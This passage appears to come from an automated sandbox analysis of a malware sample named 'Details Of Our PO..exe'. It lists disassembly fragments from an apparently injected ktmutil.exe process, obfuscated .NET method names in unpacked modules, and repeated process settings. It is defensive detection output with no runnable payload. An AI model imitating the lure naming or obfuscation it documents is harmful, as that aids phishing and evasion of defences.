Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_03302CDF push es; ret	3_2_03302CF7
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0300225F pushad ; ret	4_2_030027F9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030027FA pushad ; ret	4_2_030027F9
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030309AD push ecx; mov dword ptr [esp], ecx	4_2_030309B6
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0300283D push eax; iretd	4_2_03002858
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0300135E push eax; iretd	4_2_03001369
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0052A200 push ds; ret	4_2_0052A2C3
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0051C2A4 push es; retf	4_2_0051C2A5
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0051C397 push 50DE8CE6h; ret	4_2_0051C3AF
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0051C5AE push esp; ret	4_2_0051C5B1
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0051CFFB push esp; iretd	4_2_0051D008
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00515366 push ecx; ret	4_2_0051536D
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00507879 push es; ret	4_2_00507891
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0051B89A push edi; iretd	4_2_0051B89C
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_0051D8BF push ecx; ret	4_2_0051D8C0

Source: 0.2.Details Of Our PO..exe.32d6fbc.1.raw.unpack, P3eh8af2o4VTkSD0Y3.cs	High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.Details Of Our PO..exe.32d6fbc.1.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.Details Of Our PO..exe.32d6fbc.1.raw.unpack, ihTFxFFnSRQetgx2gS.cs	High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, uihWa9FRNPUyOSq1R0w.cs	High entropy of concatenated method names: 'ToString', 'D8gOEvB54d', 'h92OnlaZ0j', 'zUFOB1KFHJ', 'JDAObnr4KK', 'RQBO2mIvf9', 'jM3OIcGR1N', 'Sp3OkB4Cl3', 'sFvm2glEe42iJh5lM0P', 'Rr6NNtlf2OFExmiLt7m'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, sgYpuIRNQ2QwSlpx68.cs	High entropy of concatenated method names: 'cXhu9QJOJ', 'CZ8s7H8EY', 'oymhmHKfI', 'LIf6vOa1c', 'BxKnABxSC', 'gWkBoxBsm', 'v7QNdmp6vB0MGxA8W9', 'swx9s91FIxRKNevx8y', 'domc7S4LR', 'qAZQmn1rl'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, gtI4bxPOtVjtuknJxd.cs	High entropy of concatenated method names: 'svOyb5sGNb', 'xOAy2nWt1h', 'N9VyI0s7hu', 'kaqykBNvkv', 'F40ytqdM1n', 'th6yeQy0BT', 'a8WyAsL9w7', 'k7py7Z011P', 'Uk7yNuNi3u', 'HSAyK1mFvD'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, quylH1lKWtWtiZvsj0.cs	High entropy of concatenated method names: 't5SLE7Vil9', 'qm9LnunbTy', 'NZYLbdswJq', 'bEDL2aqTy0', 'LHqLkWMN5L', 'F7PLtIwLfy', 'byWLAo5hd2', 'QmvL7TCTpA', 'cC8LK1nfRa', 'SLFLHyuu99'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, dksBp9C3TcHBhSymSe.cs	High entropy of concatenated method names: 'Dispose', 'AhqFPwu1Au', 'jvYR2cR8mt', 'C8vpJEZZEn', 'xAFFjD9x33', 'TsIFzA4M2i', 'ProcessDialogKey', 'RVxRDtI4bx', 'ttVRFjtukn', 'UxdRRLflBT'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, FsxC5cY5JBbsab0uYC.cs	High entropy of concatenated method names: 'fPQ39DAlfP', 'ygD3jRH0ps', 'vBUcD82dKS', 'LKhcFAqrJJ', 'qLy3HDJaVv', 'GV73ZloRG0', 'MgM3la5HL5', 's6W3oT5T7A', 'PqR3V554yn', 'y2u3dtgirx'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	High entropy of concatenated method names: 'FFVCowy8HK', 'yh6CVXUadC', 'NwjCdwTLCu', 'hlrCqlZ3X0', 'K2fCJSgLjm', 'FulCYvS3Gr', 'CPDCWiJTkH', 'D0CC94GRYW', 'aEcCPW7aI5', 'Ya0CjIWQyP'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, SCTBPMFD3SwVyQGyQaN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FyFQHN4VLl', 'sobQZudeyN', 'fNoQl0lhZe', 'IVnQos8S18', 'VrIQVanFKj', 'OjHQdFkWZH', 'o51QqRX8gl'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, wjwVVn56BIUeuOnJiN.cs	High entropy of concatenated method names: 'dxNFwfXsND', 'VnYF1kPrZc', 'IHWFXv8NjV', 'CC5FSAfWWw', 'ICdFGmlDeL', 'kxPFaHBMml', 'tpkABJOekJf36BOnJt', 'sDNXH05w3n98o1Mj8y', 'tP8ajv4uPZ67jrIuFf', 'VJSFFREjiD'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, nflBTaj7TwdbrnbVJd.cs	High entropy of concatenated method names: 'JbLQxfV6nG', 'nTGQUYsawW', 'yCWQr7ClVY', 'ejuQwR1THM', 'EZyQyMA8A9', 'fa5Q1dhJnA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	High entropy of concatenated method names: 'VyJmfOqCkW', 'FODmvZkWKX', 'SapmCXRI1l', 'JLimxkMXLH', 'oRpmUTPpGI', 'd31mr5b5rO', 'CqRmwFYYQ6', 'iXXm1hv4pc', 'n8PmTDWblj', 'TV9mX81T3F'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, sT4WaknHWv8NjVhC5A.cs	High entropy of concatenated method names: 'QiZxs8PAnH', 'FUUxhJrV6m', 'BTYxELLarg', 'jWGxnqWqbe', 'R9RxG3BLSr', 'GI4xabxAki', 'HWSx31A9tE', 'tW1xcNcUY7', 'QD2xyTscQ5', 'pOJxQq7JV0'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, Vau9IxF5u5OKCAJdxE0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BBGpyY8pGY', 'OoupQXsko4', 'pr9pOgIoUf', 'u48ppkwQ00', 'v0Dp4mCYqn', 'PAZpM6wP2l', 'leNpiSP3Y2'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, I3yXh5z8QOrOMYaR4C.cs	High entropy of concatenated method names: 'PgFQhOfwmK', 'PjaQEWKkOI', 't7XQnGweP5', 'vMYQbM7Z2w', 'QqHQ27Vim3', 'CLEQkDrMGq', 'oWfQt7RJNo', 'IHAQiu6AvE', 'uaDQ0lJx8R', 'jyCQg61PYn'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, TVcieEFF8ZPTljS25dw.cs	High entropy of concatenated method names: 'QsTQjHYlny', 'rR1QzPMYXb', 'BQ5ODw0ywl', 'dCrOFqbAOu', 'BkaORHVRDv', 'DsVOmYBkdS', 'HpZO5gTpNh', 'bEFOf9FYZh', 'JB6Ovy0mCE', 'ntZOCUQA4g'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, XsWC8dADtygZTgViow.cs	High entropy of concatenated method names: 'aPvwv9e9IN', 'X8bwx3RU7a', 'KCywr31qk9', 'srXrjvdaZh', 'XyCrzIVWA1', 'dN0wDUpFUl', 'z9fwFLJoT5', 'JDswRxYXIM', 'mjlwmgbVqk', 'v3Ow51DZnI'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, xyNcKuqSWdy7N7fAyC.cs	High entropy of concatenated method names: 'UYq3XgSZJV', 'PMX3SiaHv4', 'ToString', 'jcb3vMKQTN', 'hqP3CQfka6', 'GxI3xgrehK', 'Go33U9cuoC', 'eio3rIu1Ch', 'vuW3wtaEH5', 'd77313ith6'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, aeL1xPbHBMmlqA63j6.cs	High entropy of concatenated method names: 'hRrrfFf9KG', 'IeZrCGvGio', 'RbIrUHJAK9', 'nlFrwT5x4M', 'mgSr1dkTCx', 'AvDUJG4e6b', 'SxrUYCFKlr', 'pFhUWenFI7', 'LaIU9IYvA5', 'dBLUPkkBhn'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, uHkTEUWoI8hqwu1Aui.cs	High entropy of concatenated method names: 'Wp9yGDShrG', 'nRiy39sUMD', 'Tjyyy9oZR5', 'TtuyOcdErH', 'j0yy4wsdfQ', 'k5XyiuDVhr', 'Dispose', 'OgOcviEJOM', 'wj8cCYVXXu', 'cBScxP2gnt'
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, C1JruYNs1Thr5cMP1m.cs	High entropy of concatenated method names: 'EQsw0UuJMD', 'nNIwgpDvPr', 'hTdwuvNEHm', 'fSCwsvnkut', 'AgJw8GIxe0', 'wvywh5iZa6', 'k3tw6uFmDO', 'zQ8wEuK1TI', 'qadwnBExtp', 'uPcwBmMc0P'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, uihWa9FRNPUyOSq1R0w.cs	High entropy of concatenated method names: 'ToString', 'D8gOEvB54d', 'h92OnlaZ0j', 'zUFOB1KFHJ', 'JDAObnr4KK', 'RQBO2mIvf9', 'jM3OIcGR1N', 'Sp3OkB4Cl3', 'sFvm2glEe42iJh5lM0P', 'Rr6NNtlf2OFExmiLt7m'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, sgYpuIRNQ2QwSlpx68.cs	High entropy of concatenated method names: 'cXhu9QJOJ', 'CZ8s7H8EY', 'oymhmHKfI', 'LIf6vOa1c', 'BxKnABxSC', 'gWkBoxBsm', 'v7QNdmp6vB0MGxA8W9', 'swx9s91FIxRKNevx8y', 'domc7S4LR', 'qAZQmn1rl'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, gtI4bxPOtVjtuknJxd.cs	High entropy of concatenated method names: 'svOyb5sGNb', 'xOAy2nWt1h', 'N9VyI0s7hu', 'kaqykBNvkv', 'F40ytqdM1n', 'th6yeQy0BT', 'a8WyAsL9w7', 'k7py7Z011P', 'Uk7yNuNi3u', 'HSAyK1mFvD'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, quylH1lKWtWtiZvsj0.cs	High entropy of concatenated method names: 't5SLE7Vil9', 'qm9LnunbTy', 'NZYLbdswJq', 'bEDL2aqTy0', 'LHqLkWMN5L', 'F7PLtIwLfy', 'byWLAo5hd2', 'QmvL7TCTpA', 'cC8LK1nfRa', 'SLFLHyuu99'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, dksBp9C3TcHBhSymSe.cs	High entropy of concatenated method names: 'Dispose', 'AhqFPwu1Au', 'jvYR2cR8mt', 'C8vpJEZZEn', 'xAFFjD9x33', 'TsIFzA4M2i', 'ProcessDialogKey', 'RVxRDtI4bx', 'ttVRFjtukn', 'UxdRRLflBT'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, FsxC5cY5JBbsab0uYC.cs	High entropy of concatenated method names: 'fPQ39DAlfP', 'ygD3jRH0ps', 'vBUcD82dKS', 'LKhcFAqrJJ', 'qLy3HDJaVv', 'GV73ZloRG0', 'MgM3la5HL5', 's6W3oT5T7A', 'PqR3V554yn', 'y2u3dtgirx'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	High entropy of concatenated method names: 'FFVCowy8HK', 'yh6CVXUadC', 'NwjCdwTLCu', 'hlrCqlZ3X0', 'K2fCJSgLjm', 'FulCYvS3Gr', 'CPDCWiJTkH', 'D0CC94GRYW', 'aEcCPW7aI5', 'Ya0CjIWQyP'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, SCTBPMFD3SwVyQGyQaN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FyFQHN4VLl', 'sobQZudeyN', 'fNoQl0lhZe', 'IVnQos8S18', 'VrIQVanFKj', 'OjHQdFkWZH', 'o51QqRX8gl'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, wjwVVn56BIUeuOnJiN.cs	High entropy of concatenated method names: 'dxNFwfXsND', 'VnYF1kPrZc', 'IHWFXv8NjV', 'CC5FSAfWWw', 'ICdFGmlDeL', 'kxPFaHBMml', 'tpkABJOekJf36BOnJt', 'sDNXH05w3n98o1Mj8y', 'tP8ajv4uPZ67jrIuFf', 'VJSFFREjiD'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, nflBTaj7TwdbrnbVJd.cs	High entropy of concatenated method names: 'JbLQxfV6nG', 'nTGQUYsawW', 'yCWQr7ClVY', 'ejuQwR1THM', 'EZyQyMA8A9', 'fa5Q1dhJnA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	High entropy of concatenated method names: 'VyJmfOqCkW', 'FODmvZkWKX', 'SapmCXRI1l', 'JLimxkMXLH', 'oRpmUTPpGI', 'd31mr5b5rO', 'CqRmwFYYQ6', 'iXXm1hv4pc', 'n8PmTDWblj', 'TV9mX81T3F'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, sT4WaknHWv8NjVhC5A.cs	High entropy of concatenated method names: 'QiZxs8PAnH', 'FUUxhJrV6m', 'BTYxELLarg', 'jWGxnqWqbe', 'R9RxG3BLSr', 'GI4xabxAki', 'HWSx31A9tE', 'tW1xcNcUY7', 'QD2xyTscQ5', 'pOJxQq7JV0'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, Vau9IxF5u5OKCAJdxE0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BBGpyY8pGY', 'OoupQXsko4', 'pr9pOgIoUf', 'u48ppkwQ00', 'v0Dp4mCYqn', 'PAZpM6wP2l', 'leNpiSP3Y2'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, I3yXh5z8QOrOMYaR4C.cs	High entropy of concatenated method names: 'PgFQhOfwmK', 'PjaQEWKkOI', 't7XQnGweP5', 'vMYQbM7Z2w', 'QqHQ27Vim3', 'CLEQkDrMGq', 'oWfQt7RJNo', 'IHAQiu6AvE', 'uaDQ0lJx8R', 'jyCQg61PYn'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, TVcieEFF8ZPTljS25dw.cs	High entropy of concatenated method names: 'QsTQjHYlny', 'rR1QzPMYXb', 'BQ5ODw0ywl', 'dCrOFqbAOu', 'BkaORHVRDv', 'DsVOmYBkdS', 'HpZO5gTpNh', 'bEFOf9FYZh', 'JB6Ovy0mCE', 'ntZOCUQA4g'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, XsWC8dADtygZTgViow.cs	High entropy of concatenated method names: 'aPvwv9e9IN', 'X8bwx3RU7a', 'KCywr31qk9', 'srXrjvdaZh', 'XyCrzIVWA1', 'dN0wDUpFUl', 'z9fwFLJoT5', 'JDswRxYXIM', 'mjlwmgbVqk', 'v3Ow51DZnI'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, xyNcKuqSWdy7N7fAyC.cs	High entropy of concatenated method names: 'UYq3XgSZJV', 'PMX3SiaHv4', 'ToString', 'jcb3vMKQTN', 'hqP3CQfka6', 'GxI3xgrehK', 'Go33U9cuoC', 'eio3rIu1Ch', 'vuW3wtaEH5', 'd77313ith6'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, aeL1xPbHBMmlqA63j6.cs	High entropy of concatenated method names: 'hRrrfFf9KG', 'IeZrCGvGio', 'RbIrUHJAK9', 'nlFrwT5x4M', 'mgSr1dkTCx', 'AvDUJG4e6b', 'SxrUYCFKlr', 'pFhUWenFI7', 'LaIU9IYvA5', 'dBLUPkkBhn'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, uHkTEUWoI8hqwu1Aui.cs	High entropy of concatenated method names: 'Wp9yGDShrG', 'nRiy39sUMD', 'Tjyyy9oZR5', 'TtuyOcdErH', 'j0yy4wsdfQ', 'k5XyiuDVhr', 'Dispose', 'OgOcviEJOM', 'wj8cCYVXXu', 'cBScxP2gnt'
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, C1JruYNs1Thr5cMP1m.cs	High entropy of concatenated method names: 'EQsw0UuJMD', 'nNIwgpDvPr', 'hTdwuvNEHm', 'fSCwsvnkut', 'AgJw8GIxe0', 'wvywh5iZa6', 'k3tw6uFmDO', 'zQ8wEuK1TI', 'qadwnBExtp', 'uPcwBmMc0P'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, uihWa9FRNPUyOSq1R0w.cs	High entropy of concatenated method names: 'ToString', 'D8gOEvB54d', 'h92OnlaZ0j', 'zUFOB1KFHJ', 'JDAObnr4KK', 'RQBO2mIvf9', 'jM3OIcGR1N', 'Sp3OkB4Cl3', 'sFvm2glEe42iJh5lM0P', 'Rr6NNtlf2OFExmiLt7m'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, sgYpuIRNQ2QwSlpx68.cs	High entropy of concatenated method names: 'cXhu9QJOJ', 'CZ8s7H8EY', 'oymhmHKfI', 'LIf6vOa1c', 'BxKnABxSC', 'gWkBoxBsm', 'v7QNdmp6vB0MGxA8W9', 'swx9s91FIxRKNevx8y', 'domc7S4LR', 'qAZQmn1rl'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, gtI4bxPOtVjtuknJxd.cs	High entropy of concatenated method names: 'svOyb5sGNb', 'xOAy2nWt1h', 'N9VyI0s7hu', 'kaqykBNvkv', 'F40ytqdM1n', 'th6yeQy0BT', 'a8WyAsL9w7', 'k7py7Z011P', 'Uk7yNuNi3u', 'HSAyK1mFvD'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, quylH1lKWtWtiZvsj0.cs	High entropy of concatenated method names: 't5SLE7Vil9', 'qm9LnunbTy', 'NZYLbdswJq', 'bEDL2aqTy0', 'LHqLkWMN5L', 'F7PLtIwLfy', 'byWLAo5hd2', 'QmvL7TCTpA', 'cC8LK1nfRa', 'SLFLHyuu99'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, dksBp9C3TcHBhSymSe.cs	High entropy of concatenated method names: 'Dispose', 'AhqFPwu1Au', 'jvYR2cR8mt', 'C8vpJEZZEn', 'xAFFjD9x33', 'TsIFzA4M2i', 'ProcessDialogKey', 'RVxRDtI4bx', 'ttVRFjtukn', 'UxdRRLflBT'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, FsxC5cY5JBbsab0uYC.cs	High entropy of concatenated method names: 'fPQ39DAlfP', 'ygD3jRH0ps', 'vBUcD82dKS', 'LKhcFAqrJJ', 'qLy3HDJaVv', 'GV73ZloRG0', 'MgM3la5HL5', 's6W3oT5T7A', 'PqR3V554yn', 'y2u3dtgirx'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	High entropy of concatenated method names: 'FFVCowy8HK', 'yh6CVXUadC', 'NwjCdwTLCu', 'hlrCqlZ3X0', 'K2fCJSgLjm', 'FulCYvS3Gr', 'CPDCWiJTkH', 'D0CC94GRYW', 'aEcCPW7aI5', 'Ya0CjIWQyP'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, SCTBPMFD3SwVyQGyQaN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FyFQHN4VLl', 'sobQZudeyN', 'fNoQl0lhZe', 'IVnQos8S18', 'VrIQVanFKj', 'OjHQdFkWZH', 'o51QqRX8gl'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, wjwVVn56BIUeuOnJiN.cs	High entropy of concatenated method names: 'dxNFwfXsND', 'VnYF1kPrZc', 'IHWFXv8NjV', 'CC5FSAfWWw', 'ICdFGmlDeL', 'kxPFaHBMml', 'tpkABJOekJf36BOnJt', 'sDNXH05w3n98o1Mj8y', 'tP8ajv4uPZ67jrIuFf', 'VJSFFREjiD'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, nflBTaj7TwdbrnbVJd.cs	High entropy of concatenated method names: 'JbLQxfV6nG', 'nTGQUYsawW', 'yCWQr7ClVY', 'ejuQwR1THM', 'EZyQyMA8A9', 'fa5Q1dhJnA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	High entropy of concatenated method names: 'VyJmfOqCkW', 'FODmvZkWKX', 'SapmCXRI1l', 'JLimxkMXLH', 'oRpmUTPpGI', 'd31mr5b5rO', 'CqRmwFYYQ6', 'iXXm1hv4pc', 'n8PmTDWblj', 'TV9mX81T3F'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, sT4WaknHWv8NjVhC5A.cs	High entropy of concatenated method names: 'QiZxs8PAnH', 'FUUxhJrV6m', 'BTYxELLarg', 'jWGxnqWqbe', 'R9RxG3BLSr', 'GI4xabxAki', 'HWSx31A9tE', 'tW1xcNcUY7', 'QD2xyTscQ5', 'pOJxQq7JV0'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, Vau9IxF5u5OKCAJdxE0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BBGpyY8pGY', 'OoupQXsko4', 'pr9pOgIoUf', 'u48ppkwQ00', 'v0Dp4mCYqn', 'PAZpM6wP2l', 'leNpiSP3Y2'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, I3yXh5z8QOrOMYaR4C.cs	High entropy of concatenated method names: 'PgFQhOfwmK', 'PjaQEWKkOI', 't7XQnGweP5', 'vMYQbM7Z2w', 'QqHQ27Vim3', 'CLEQkDrMGq', 'oWfQt7RJNo', 'IHAQiu6AvE', 'uaDQ0lJx8R', 'jyCQg61PYn'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, TVcieEFF8ZPTljS25dw.cs	High entropy of concatenated method names: 'QsTQjHYlny', 'rR1QzPMYXb', 'BQ5ODw0ywl', 'dCrOFqbAOu', 'BkaORHVRDv', 'DsVOmYBkdS', 'HpZO5gTpNh', 'bEFOf9FYZh', 'JB6Ovy0mCE', 'ntZOCUQA4g'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, XsWC8dADtygZTgViow.cs	High entropy of concatenated method names: 'aPvwv9e9IN', 'X8bwx3RU7a', 'KCywr31qk9', 'srXrjvdaZh', 'XyCrzIVWA1', 'dN0wDUpFUl', 'z9fwFLJoT5', 'JDswRxYXIM', 'mjlwmgbVqk', 'v3Ow51DZnI'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, xyNcKuqSWdy7N7fAyC.cs	High entropy of concatenated method names: 'UYq3XgSZJV', 'PMX3SiaHv4', 'ToString', 'jcb3vMKQTN', 'hqP3CQfka6', 'GxI3xgrehK', 'Go33U9cuoC', 'eio3rIu1Ch', 'vuW3wtaEH5', 'd77313ith6'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, aeL1xPbHBMmlqA63j6.cs	High entropy of concatenated method names: 'hRrrfFf9KG', 'IeZrCGvGio', 'RbIrUHJAK9', 'nlFrwT5x4M', 'mgSr1dkTCx', 'AvDUJG4e6b', 'SxrUYCFKlr', 'pFhUWenFI7', 'LaIU9IYvA5', 'dBLUPkkBhn'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, uHkTEUWoI8hqwu1Aui.cs	High entropy of concatenated method names: 'Wp9yGDShrG', 'nRiy39sUMD', 'Tjyyy9oZR5', 'TtuyOcdErH', 'j0yy4wsdfQ', 'k5XyiuDVhr', 'Dispose', 'OgOcviEJOM', 'wj8cCYVXXu', 'cBScxP2gnt'
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, C1JruYNs1Thr5cMP1m.cs	High entropy of concatenated method names: 'EQsw0UuJMD', 'nNIwgpDvPr', 'hTdwuvNEHm', 'fSCwsvnkut', 'AgJw8GIxe0', 'wvywh5iZa6', 'k3tw6uFmDO', 'zQ8wEuK1TI', 'qadwnBExtp', 'uPcwBmMc0P'
Source: 0.2.Details Of Our PO..exe.9860000.6.raw.unpack, P3eh8af2o4VTkSD0Y3.cs	High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.Details Of Our PO..exe.9860000.6.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.Details Of Our PO..exe.9860000.6.raw.unpack, ihTFxFFnSRQetgx2gS.cs	High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
